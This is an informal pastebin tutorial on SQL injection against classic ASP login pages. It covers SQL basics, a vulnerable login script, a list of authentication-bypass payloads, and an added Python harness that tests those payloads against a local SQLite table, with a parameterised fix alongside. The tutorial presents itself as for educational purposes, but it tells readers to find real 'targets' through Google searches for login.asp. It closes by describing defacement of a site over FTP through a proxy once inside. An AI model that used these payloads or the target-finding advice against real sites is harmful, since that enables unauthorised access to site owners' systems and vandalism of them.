Untitled
a guest
Nov 6th, 2016
Before we start this tutorial: it is for educational purposes only. I am not responsible for what you do with it, and I will not help you with any legal trouble you get into.
---------------------------------------------------------------------------------
SQL INJECTION Tutorial
This is for people in Royalty who have only a brief idea, or absolutely no idea, of what SQLi is and have no idea how to find a
vulnerable target to exploit through simple SQL injection.
  6.  
  7.  
  8.  
  9. Section 1
  10. 1- DATABASES
  11. 2- SQL
  12. 3 - MS SQL
  13. 4 LOGIN
  14.  
  15. Section 2
  16. 5 LOGIN.ASP /ADMIN/LOGIN.ASP
  17. 6 CHECKING THE SOURCE
  18. 7- NUMERIC PARAMETERS
  19. 8 - THE INJECTION
  20. 9- OTHER QUERY STRINGS
  21. 10 - WHAT TO DO
  22.  
1 - DATABASES
 
This might look boring to you; if so, skip it, I don't mind. The simplest way to think of a database is as a library: a
structured way of storing and retrieving data. A database table is made up of columns, which are referred to as
'fields', and rows, which are referred to as 'records'. Take an example:
 
Name    D.O.B       User ID
-----   --------    -------
Annon   14/2/08     001
Alex    11/7/09     002
Sofia   12/09/07    003
 
This is a simple example. I will not go much further into databases and how they work for now; more information can be found with Google.
 
2 - SQL
 
SQL is short for Structured Query Language and is the language used to communicate with an SQL database. SQL
works with relational databases, the most commonly used kind of database out there, and uses queries to get information
from tables within the database. SQL has many statements and clauses, but we will not be going into them in the BEGINNERS
part of the tutorial. The ones we will be focusing on are as follows:
 
SELECT - This is the basis of the SQL language. It starts every query that follows, and names the fields (or * for all
of them) that you want returned from the table.
FROM - This clause names the table to read from, e.g. 'table1' or 'password'.
WHERE - This clause lets you specify conditions that a record must meet to be returned.
 
These are the basics you will be using in this part of the tutorial. Now to put these commands into action.
 
3 - MS SQL
 
MS SQL is what we will be focusing on in this tutorial. MS SQL is Microsoft SQL Server, Microsoft's relational database.
It is a cheaper alternative to databases like Oracle, which means there are a lot of targets out there; whether
or not they are vulnerable is another thing, and we will discuss that later in this tutorial. We will learn how to hack it
through the web application in our browser, on port 80 (HTTP). In my advanced tutorial, we will also find out how to hack
MS SQL directly on its own port: SQL Server listens on TCP 1433 by default, and the SQL Server Browser service that
resolves named instances is on UDP 1434.
 
4 - LOGIN
 
This is the basic query behind a login page that uses SQL (note that this is only an example; you will not find it in the
page source, because server-side code is never sent to the browser).
 
*NOTE* In SQL, * is a wildcard. It is a shortcut used to represent all fields. Also note that an empty string ('') is not the same as NULL!
 
" SELECT * FROM table1 WHERE login='"&log&"' and password='"&pass&"' "
 
The & operator glues the text typed into the form straight into the query. Let's say that log = Th3_R@V3N and pass = haxxoRe;
the query sent to the database is:
 
SELECT * FROM table1 WHERE login='Th3_R@V3N' and password='haxxoRe'
 
The database returns the record from table1 where the login is Th3_R@V3N and the password is haxxoRe, so the login
succeeds. If either value is wrong, no record comes back and the login fails.
 
5 - LOGIN.ASP and /ADMIN/LOGIN.ASP
 
Classic ASP pages (the .asp extension) are Microsoft's server-side scripting, and they are very commonly the front end to an
MS SQL or Access database. Searching Google for login pages with names like login.asp or /admin/login.asp will turn up a hell of
a lot of targets. However, not all of these are vulnerable. When you find a target, open it up; you should see a Username field and a
Password field (in most cases). Congratulations, you are now 1337. Not really, but you have taken the first, and easiest,
step.
 
6 - CHECKING THE SOURCE
 
You should all know how to look at the source of a page; if not, right-click in your browser and go to View Source.
Remember that View Source only shows you the HTML the server sent; the ASP code itself runs on the server and is never
visible to you. It still helps to know what a typical webmaster's login script looks like, so you know what you are up
against. A typical example would be:
 
Code:
 
<%@ Language="VBScript" %>
<%
Dim conn, rs, log, pwd
' Values taken straight from the POSTed form, with no validation or escaping
log = Request.Form("login_name")
pwd = Request.Form("pass")

' Connect to an Access (.mdb) database file through the Jet OLE DB provider
Set conn = Server.CreateObject("ADODB.Connection")
conn.ConnectionString = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=c:\database\tab1.mdb"
conn.Open

' The user-supplied text is concatenated directly into the SQL: this is the injection point
Set rs = Server.CreateObject("ADODB.Recordset")
rs.Open "SELECT * FROM table1 WHERE login='" & log & "' AND password='" & pwd & "'", conn

' Any returned record at all counts as a successful login
If rs.EOF Then
    Response.Write("Login failed")
Else
    Response.Write("Login successful")
End If
%>
 
Note that this particular script talks to an Access database file through Jet rather than to MS SQL Server, but the
mistake is the same in either case: the form values are pasted straight into the query text. This is very basic
code, but it gives you an insight into the kind of code you are dealing with. What you can actually see in the page
source is anything between <FORM> and </FORM>: this gives you the method (GET or POST) and action of the form, the
names of the input fields, and sometimes hidden values.
 
7 - NUMERIC PARAMETERS
 
I will not go too much into this, as it is just a beginners' guide. However, it is important to know what numeric
parameters are. There are normally three different types of field:
 
String
Date
Number
 
The database works out which type a value is from how it is written in the query. For example,
LEET would obviously be a string, and 1337 would be a number, although it can also be written as a string ('1337').
The difference is that strings and dates have quotes around them, whereas numbers do not.
 
EXAMPLE
 
SELECT * FROM table1 WHERE name='LEET'
SELECT * FROM table1 WHERE id=7
 
This should be remembered when doing advanced SQL attacks using the UNION clause. It should also be remembered
that with a string parameter your injection first has to break out of the quotes with a ' of its own, whereas with a
numeric parameter there are no quotes to break out of, so something like 7 or 1=1 goes straight into the query. That
will be covered later.
 
 
8 - THE INJECTION
 
OK, I know that the stuff above has been boring. But now we get to the good stuff: the actual injection.
An SQL injection is putting specially crafted text into the password and/or username field, using characters that have
a meaning in SQL, above all the single quote, which ends a string, and --, which starts a comment in MS SQL. If the admin
has not stripped or escaped these characters, you can get into the system by fooling it into thinking you have the correct
password when you don't. Take the example:
 
' or a=a--
 
This may look simple. But how can attackers use this to get access? Well, let us take the previous example.
 
" SELECT * FROM table1 WHERE login='"&log&"' and password='"&pass&"' "
 
Now let us say that the user Magic is an admin on the site, and you wish to get access to his account. You would use
one of the following injections (I have used two different query strings to show two different ways access will be granted):
 
User: Magic
Password: ' or a=a--
Password: hi' or 'a'='a
 
Now, if you have a lazy admin, you will get access to the site as Magic. Why? Let us substitute! Taking the second one first:
 
SELECT * FROM table1 WHERE login='Magic' and password='hi' or 'a'='a'
 
*NOTE* that in the query the login and password values each sit between a pair of ' characters, e.g. 'pass', and both of
those quotes come from the original query. It is important to note this for this example: the closing ' after your input is
already there, which is why we use hi' or 'a'='a and not hi' or 'a'='a'. There is a difference =)
 
In this example, obviously the password is not 'hi', but on the other hand 'a' does equal 'a', so the condition is met =D
Note that AND binds tighter than OR, so the database reads this as (login='Magic' and password='hi') OR 'a'='a', which
is true for every record in the table. The whole table comes back and the script logs you in as the first record it gets,
which may or may not be Magic. To land on a specific account, put the injection in the username field instead: the user
name Magic'-- turns the query into login='Magic'-- and the password check is commented out.
 
Now the first one:
 
SELECT * FROM table1 WHERE login='Magic' and password='' or a=a-- '
 
It is important to note that -- turns the rest of the query into a comment, so it is not checked.
 
In this example, the password does not equal the empty string (''), but a does equal a (and remember that -- made
the rest of the query not matter, so we do not need to worry about the trailing ' character).
 
One caveat on this one: without quotes, a is read as a column name rather than as text, so on MS SQL and most other
databases a=a only works if the table happens to have a column called a; otherwise the query errors out and the login
fails. ' or 'a'='a'-- or ' or 1=1-- does the same job without that dependency.
 
 
9 - OTHER QUERY STRINGS
 
Here is a publicly available list of query strings. Note that not all will work, so you may have to try a few before you get
one that works; or, similarly, you could make up your own. A few things to keep in mind: use the ' forms where the
query wraps your input in single quotes (the usual case), the " forms where it uses double quotes, the ) forms where your
input sits inside parentheses, and the forms with no leading quote only where the parameter is numeric. -- is the comment
marker on MS SQL; # is the MySQL comment marker and is a syntax error on MS SQL.
 
admin'--
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
 
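As an added example that is not part of the original tutorial, here is the login query from Sections 4 to 8 rebuilt in Python against an in-memory SQLite database, so the payloads above can be run and checked offline. SQLite stands in for MS SQL / Jet here (an assumption made so the example runs anywhere; it shares the single-quote string syntax and the -- comment marker, while # is MySQL-only and fails on both). The table name table1, the sample users and their passwords, and the parameterised safe_login alternative are this example's own assumptions, not the page's. It reproduces the string-context bypass from Section 8, the unquoted numeric case from Section 7, the admin'-- style username injection, and a small harness that feeds any list of candidate strings from Section 9 through the vulnerable login and reports which ones log you in and as whom.

```python
"""Added example, not from the original tutorial: the concatenated login query
from the ASP snippet, rebuilt so the injection payloads can be tried offline.
SQLite stands in for MS SQL / Jet (assumption); table1, the sample users and
safe_login are this example's own assumptions."""
import sqlite3

# Constructed sample data: the tutorial's table1 with two of its users.
SAMPLE_USERS = [
    ("Magic", "s3cr3t"),        # the admin from Section 8 (password assumed)
    ("Th3_R@V3N", "haxxoRe"),   # the user from Section 4
]


def make_db() -> sqlite3.Connection:
    """Build an in-memory table1 (id, login, password) with the sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE table1 (id INTEGER PRIMARY KEY, login TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO table1 (login, password) VALUES (?, ?)", SAMPLE_USERS
    )
    return conn


def build_query(log: str, pwd: str) -> str:
    """The exact string concatenation the ASP code does (Section 6)."""
    return (
        "SELECT * FROM table1 WHERE login='" + log + "' and password='" + pwd + "'"
    )


def vulnerable_login(conn: sqlite3.Connection, log: str, pwd: str):
    """Mirror of 'If rs.EOF': any row at all means success.

    Returns the login name of the first row the database hands back, or
    None when nothing matches or the injected text breaks the query
    (a syntax error is a failed login, not a bypass)."""
    try:
        row = conn.execute(build_query(log, pwd)).fetchone()
    except sqlite3.Error:
        return None
    return row[1] if row else None  # row = (id, login, password)


def safe_login(conn: sqlite3.Connection, log: str, pwd: str):
    """Parameterised version: the SQL text is fixed and the values travel
    separately, so quotes and -- inside them are just characters."""
    row = conn.execute(
        "SELECT * FROM table1 WHERE login=? AND password=?", (log, pwd)
    ).fetchone()
    return row[1] if row else None


def vulnerable_lookup_by_id(conn: sqlite3.Connection, id_param: str) -> list:
    """Section 7: a numeric parameter has no quotes around it, so the
    injected text needs no quote of its own to reach the query."""
    rows = conn.execute("SELECT login FROM table1 WHERE id=" + id_param).fetchall()
    return [r[0] for r in rows]


def try_payloads(conn: sqlite3.Connection, user: str, payloads) -> dict:
    """Section 9 harness: feed each candidate string through the vulnerable
    login as the password and record who (if anyone) it logs in as."""
    return {p: vulnerable_login(conn, user, p) for p in payloads}


if __name__ == "__main__":
    db = make_db()
    candidates = [
        "hi' or 'a'='a",   # Section 8: the closing quote is supplied by the query
        "' or a=a--",      # Section 8: bare a is a column name, so it errors here
        "hi' or 1=1 --",   # works: AND binds tighter than OR, every row matches
        "' or 0=0 #",      # MySQL comment marker: syntax error on SQLite / MS SQL
        'hi" or "a"="a',   # wrong quote style for a single-quoted query: no rows
    ]
    for payload, who in try_payloads(db, "Magic", candidates).items():
        print(build_query("Magic", payload), "->", who)
    print("username Magic'-- :", vulnerable_login(db, "Magic'--", "anything"))
    print("id=7 or 1=1       :", vulnerable_lookup_by_id(db, "7 or 1=1"))
    print("safe_login        :", safe_login(db, "Magic", "hi' or 'a'='a"))
```

Run it as a script to see each substituted query beside the account it logs you in as. The bypass payloads return the first record in the table (Magic only because he was inserted first), the username injection Magic'-- returns Magic regardless of the password, the numeric 7 or 1=1 returns every login, and the same strings passed to safe_login never match because the driver hands them to the database as plain values.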
10 - WHAT TO DO
 
There are many things an attacker will do once inside. Most likely they will wreck the place, and most likely they will
be doing it through a proxy, wink. They could then get into the FTP using the admin's name and password and deface the site
through the index.html file, and they would more than likely keep a backup of the original in the hope of saving themselves
some serious jail time.
---------------------------------------------------------------------
Enjoy